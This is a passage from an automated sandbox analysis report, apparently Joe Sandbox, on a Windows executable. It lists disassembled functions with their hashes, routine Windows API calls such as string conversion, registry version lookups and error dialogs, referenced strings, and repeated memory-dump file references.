                                                                                                                        • Instruction ID: 9f89b8dcf7f770c9608733cc378f38016b5008aa602b2969820ed4e513d82528
                                                                                                                        • Opcode Fuzzy Hash: 1b18a38131ce7fce63ae30e6e84db181954860e2b4c12b5ea27fecefa44c3926
                                                                                                                        • Instruction Fuzzy Hash: 9E51BE71A0016AAF8F20DF64EC808BFB7B9FB45304BD5853FEA1183252D7359D498B59
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 118dc5757c2c4c7984d9873d44fd404751a60e15956d8b869370170dd54cf642
                                                                                                                        • Instruction ID: caa39dc95d6f33b0c3bcdbfead75a80356606b39845c86f44a5aa7fea5f7728a
                                                                                                                        • Opcode Fuzzy Hash: 118dc5757c2c4c7984d9873d44fd404751a60e15956d8b869370170dd54cf642
                                                                                                                        • Instruction Fuzzy Hash: FB41E3B1E021769B8F20BF65BC844AF7A74EA02728790412FF914A6251EB3C4D40CB9D
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,V^B,000000FF,00000000,00000000,00000000,00000000,?,?,?,0042EF91,?,00000000,00000000,00000000), ref: 0042EED4
                                                                                                                        • GetLastError.KERNEL32(?,?,?,0042EF91,?,00000000,00000000,00000000,00425E56,00000000,00000000,00000000), ref: 0042EEDE
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,V^B,V^B,00000000,00000000,?,?,?,0042EF91,?,00000000,00000000,00000000,00425E56,00000000), ref: 0042EF33
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,V^B,000000FF,00000000,00000000,00000000,00000000,?,?,?,0042EF91,?,00000000,00000000,00000000), ref: 0042EF5A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                        • String ID: V^B
                                                                                                                        • API String ID: 1717984340-731569014
                                                                                                                        • Opcode ID: 8cb481713cc4cd55ac97c91bae78a6b5e8eb1afb9d0bac2b8ca7cde3352df9ed
                                                                                                                        • Instruction ID: 43b45739b5ed72f5805475e1443a07ab786b8dc6a3ef61d40b9e5f9b077d0ce1
                                                                                                                        • Opcode Fuzzy Hash: 8cb481713cc4cd55ac97c91bae78a6b5e8eb1afb9d0bac2b8ca7cde3352df9ed
                                                                                                                        • Instruction Fuzzy Hash: F8313830300239FFCB118F26EE80A6B7BA5FF06760FA64556F520962A0C3368C50C7A9
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 0042688E
                                                                                                                          • Part of subcall function 00429838: EnterCriticalSection.KERNEL32(?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8), ref: 00429860
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterSection__lock
                                                                                                                        • String ID: @bE$@bE$LmE
                                                                                                                        • API String ID: 238394327-2432022147
                                                                                                                        • Opcode ID: a7362febf858d49887ac4fd0a0a794e3c4a9f89c7bf4e2645289f9b2683df8dd
                                                                                                                        • Instruction ID: e40cd25d26dbb6555db724202a02cf2ae53cf0c6892a069b9dabf880c229dd93
                                                                                                                        • Opcode Fuzzy Hash: a7362febf858d49887ac4fd0a0a794e3c4a9f89c7bf4e2645289f9b2683df8dd
                                                                                                                        • Instruction Fuzzy Hash: A541FBB1B117218FC7A0DF69E88065EB7F0BB08314792492FE959D7751DB78A881CF09
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                          • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                          • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                          • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                          • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                        • RegOpenKeyExA.ADVAPI32 ref: 0041653A
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,Version,00000000,00000000,?,00000100), ref: 00416562
                                                                                                                        Strings
                                                                                                                        • Version, xrefs: 00416554
                                                                                                                        • SOFTWARE\Microsoft\Active Setup\Installed Components\{D27CDB6E-AE6D-11cf-96B8-444553540000}, xrefs: 00416525
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$AddressLibraryLoadOpenPathProcQuerySystemTempValueWindows
                                                                                                                        • String ID: SOFTWARE\Microsoft\Active Setup\Installed Components\{D27CDB6E-AE6D-11cf-96B8-444553540000}$Version
                                                                                                                        • API String ID: 3927907489-1332029265
                                                                                                                        • Opcode ID: 9252eca1604ed86113a6410666951e3d9899bb3435c16dbf6c7682639952dafd
                                                                                                                        • Instruction ID: 2c3280e8fd186b36745d7fe58343f886ef13101444831185cebde92ec6972ae0
                                                                                                                        • Opcode Fuzzy Hash: 9252eca1604ed86113a6410666951e3d9899bb3435c16dbf6c7682639952dafd
                                                                                                                        • Instruction Fuzzy Hash: 5E21F371148341AFD314CF14C851BEBB7E8FB99744F104A1DF5A9832D0EB78A548CB56
                                                                                                                        APIs
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 00414EF1
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00414F00
                                                                                                                        • RemoveDirectoryA.KERNEL32(0000005C), ref: 00414F0E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseDirectoryFileNextRemove
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 2004183241-1173974218
                                                                                                                        • Opcode ID: ac6806ff917ffb584945b3d21e5ba2d1ccc03283bf577d30b185a3c62fe6ba3e
                                                                                                                        • Instruction ID: 9c89db226a464595a1456a08dba5ac67963ce04dc153f15b353361ca2e9a56d0
                                                                                                                        • Opcode Fuzzy Hash: ac6806ff917ffb584945b3d21e5ba2d1ccc03283bf577d30b185a3c62fe6ba3e
                                                                                                                        • Instruction Fuzzy Hash: F711EB751087828BC721CB28A8547EBFBD9FFD6306F144929EDC587301DB35A889C755
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 00416B9A
                                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 00416BB6
                                                                                                                        • MessageBoxA.USER32(00000000,?,DirectX Error,00000000), ref: 00416BCC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ErrorFormatLast
                                                                                                                        • String ID: DirectX Error
                                                                                                                        • API String ID: 3971115935-1449601957
                                                                                                                        • Opcode ID: e42ac2ce9476a126deb7f06afa875e21e8b1d8dd5084b04630a3d7ee1d926943
                                                                                                                        • Instruction ID: 00734949432f92e12728b15547f2c9266f1449dcf60645d6a7a156eb7abf3a75
                                                                                                                        • Opcode Fuzzy Hash: e42ac2ce9476a126deb7f06afa875e21e8b1d8dd5084b04630a3d7ee1d926943
                                                                                                                        • Instruction Fuzzy Hash: 9F018071304310ABE710DFA59C49F6B77ACEF86B15F11852DFA00CA280D674E8008669
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,00424B26), ref: 0042C2D9
                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0042C2E9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                                        • Opcode ID: 02faec45ebebc9ea8088bb5ac7c7d7aefd1fe9434e9aaf4371285750a670add2
                                                                                                                        • Instruction ID: 3010c939291e915eff1eb01b3b571670853061f70a44e764dbecd71da3a81d10
                                                                                                                        • Opcode Fuzzy Hash: 02faec45ebebc9ea8088bb5ac7c7d7aefd1fe9434e9aaf4371285750a670add2
                                                                                                                        • Instruction Fuzzy Hash: C2F01D30F40A1DD2DB001BE0BD4A26FBB78BB92746F9105E1D891A0094DF7884B4C25E
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,0044EAE0,00000010,004297E9,00000000,00000FA0,0044CDF0,00000008,00429851,?,?,?,00423F79,00000004,0044C938,0000000C), ref: 00431821
                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 00431831
                                                                                                                        Strings
                                                                                                                        • kernel32.dll, xrefs: 0043181C
                                                                                                                        • InitializeCriticalSectionAndSpinCount, xrefs: 0043182B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                                                                        • API String ID: 1646373207-3733552308
                                                                                                                        • Opcode ID: 7e93898ae70dbf0739adb7c3265fadd24f6ff0e0cb512f9bb8f0251e16c97f3e
                                                                                                                        • Instruction ID: 4a45933a82aeb79599459cbe0f8cef8bbb669c532bc06b3cb3151a140fe0d406
                                                                                                                        • Opcode Fuzzy Hash: 7e93898ae70dbf0739adb7c3265fadd24f6ff0e0cb512f9bb8f0251e16c97f3e
